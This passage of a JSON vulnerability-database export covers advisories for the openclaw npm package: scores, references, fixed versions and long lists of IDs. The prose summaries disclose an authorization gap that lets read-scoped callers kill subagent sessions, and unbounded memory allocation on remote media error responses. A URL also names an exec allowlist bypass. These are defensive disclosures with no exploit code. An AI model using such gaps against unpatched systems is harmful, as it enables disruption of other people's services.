7e3","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd7e3"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41392","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41392"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options"},{"reference_url":"https://github.com/advisories/GHSA-wpc6-37g7-8q4w","reference_id":"GHSA-wpc6-37g7-8q4w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wpc6-37g7-8q4w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41392","GHSA-wpc6-37g7-8q4w"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7wmr-v7zb-6fc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89592?format=json","vulnerability_id":"VCID-7z2s-k6ty-ekg1","summary":"OpenClaw: Read-scoped identity-bearing HTTP clients could kill sessions via /sessions/:sessionKey/kill\n## Summary\n\nBefore OpenClaw 2026.4.2, `POST /sessions/:sessionKey/kill` did not enforce write scopes in identity-bearing HTTP modes. A caller limited to read-only operator scopes could still terminate a running subagent session.\n\n## Impact\n\nA read-scoped caller could perform a write-class control-plane mutation and interrupt delegated work. This was an authorization bug on the HTTP scope boundary, not a shared-secret compatibility exception.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `54a0878517167c6e49900498cf77420dadb74beb` — enforce session-kill HTTP scopes\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @EaEa0001 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41298","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41298"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"}],"url":"https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41298","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41298"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint"},{"reference_url":"https://github.com/advisories/GHSA-5hff-46vh-rxmw","reference_id":"GHSA-5hff-46vh-rxmw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5hff-46vh-rxmw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41298","GHSA-5hff-46vh-rxmw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7z2s-k6ty-ekg1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91092?format=json","vulnerability_id":"VCID-816s-45wb-83ce","summary":"OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n## Summary\nRemote media HTTP error bodies were read without a hard size cap before failure handling, allowing unbounded allocation on error responses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `81445a901091a5d27ef0b56fceedbe4724566438`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/media/fetch.ts now routes non-2xx failures through bounded prefix reads instead of buffering the whole error body.\n- src/media/read-response-with-limit.ts enforces capped reads and truncates oversized snippets before surfacing failure text.\n\nOpenClaw thanks @YLChen-007 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35633","reference_id":"","reference_type":"","scores":[{"value":"0.00157","scoring_system":"epss","scoring_elements":"0.36209","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00157","scoring_system":"epss","scoring_elements":"0.36246","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00157","scoring_system":"epss","scoring_elements":"0.36238","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35633"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"},{"reference_url":"https://github.com/advisories/GHSA-4qwc-c7g9-4xcw","reference_id":"GHSA-4qwc-c7g9-4xcw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4qwc-c7g9-4xcw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4